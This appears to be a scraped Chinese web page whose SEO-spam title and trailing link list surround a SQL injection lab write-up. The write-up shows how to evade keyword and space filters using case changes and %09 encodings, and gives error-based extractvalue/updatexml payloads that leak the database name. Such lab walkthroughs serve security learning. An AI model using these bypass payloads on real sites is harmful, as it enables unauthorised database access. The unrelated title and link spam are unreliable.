当前位置: 首页 > news >正文

二级菜单网站如何做伪静态域名服务器地址查询

二级菜单网站如何做伪静态,域名服务器地址查询,咖搭姆少儿编程加盟,免费建设网站知识点&#xff1a; union select 关键字过滤 通过<> /**/进行截断处理 un<>ion sel<>ect 没效果uni/**/on sel/**/ect 被过滤了双写绕过 这关对select进行了多重过滤&#xff0c;无法进行双写绕过 大小写绕过 UNion SElect (这关可以用&am…

知识点:

  • union select 关键字过滤
    • 通过<> /**/进行截断处理
      • un<>ion  sel<>ect     没效果
      • uni/**/on sel/**/ect     被过滤了
    • 双写绕过     
      • 这关对select进行了多重过滤,无法进行双写绕过 
    • 大小写绕过
      • UNion SElect   (这关可以用,不演示了)
  • 空格过滤
    • %09 %0a %0b %0c %0d 进行绕过
    • 这关+和%20被过滤了,但是可以用上面的几种形式代替
  • 错误注入
    • extractvalue(1,concat(0x7e,database(),0x7e))
    • updatexml(1,concat(0x7e,database(),0x7e),1)
    • 最多展示32位,超过部分需要用截取函数处理

测试注入类型

构造payload:id=1'

构造payload:id=1''

测试发现是字符型注入

经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测

构造payload:id=1'%09and%091='1

页面成功回显出了相关信息,说明绕过成功

页面给出了提示,联合查询关键字被过滤了,直接使用错误注入

构造payload:id=1'%09and%09exp(710)='1

页面成功回显除了exp()函数的错误信息

尝试获取数据库名

构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1

成功获取到了数据库名;结束收工

10

http://www.zhongyajixie.com/news/30095.html

相关文章:

  • 怎样做音乐网站抚州网络推广
  • 淮安网站推广软文标题大全
  • 可以做样机图的网站seo云优化公司
  • 网站开发的经费预算产品推广活动策划方案
  • 网站建设代理平台详情页页面页面
  • 企石仿做网站合肥网站关键词优化公司
  • 手机智能建网站百度推广账号注册流程
  • 域名向谁申请武汉seo工厂
  • 南阳做网站多少电话seoul是什么意思中文
  • 网站建设实验分析总结旺道优化软件
  • 网站建设仟金手指六六14少女长尾关键词挖掘
  • 番禺区营销型网站建设黄页引流推广网站入口
  • wap网站 微信小程序电子商务专业就业方向
  • 网站流量 钱青岛网站建设
  • 佛山网站制作哪家好公司网站免费建站
  • 优酷 做视频网站还能成功吗营业推广方案
  • 品牌的宣传及推广seo搜索引擎优化方式
  • 网站设计与制作教程1关键词智能调词工具
  • wordpress 文章 视频西安seo
  • 青岛做网站方案怎样设计一个网页
  • 网站建设的技巧有哪些方面深圳谷歌网络推广公司
  • 哪个网站可以做魔方图片网站点击率查询
  • 常州网站seoseo营销排名
  • 做网站应该先从什么地方开始高清视频网络服务器
  • 太原网站建设杰迅餐饮最有效的营销方案
  • 做网站 天津东莞网站推广运营公司
  • wordpress xueqiu苏州seo排名公司
  • 安顺做网站谷歌推广费用多少
  • 潍坊制作网站公司武汉seo排名
  • 网站里的滚动怎么做中国宣布取消新冠免费治疗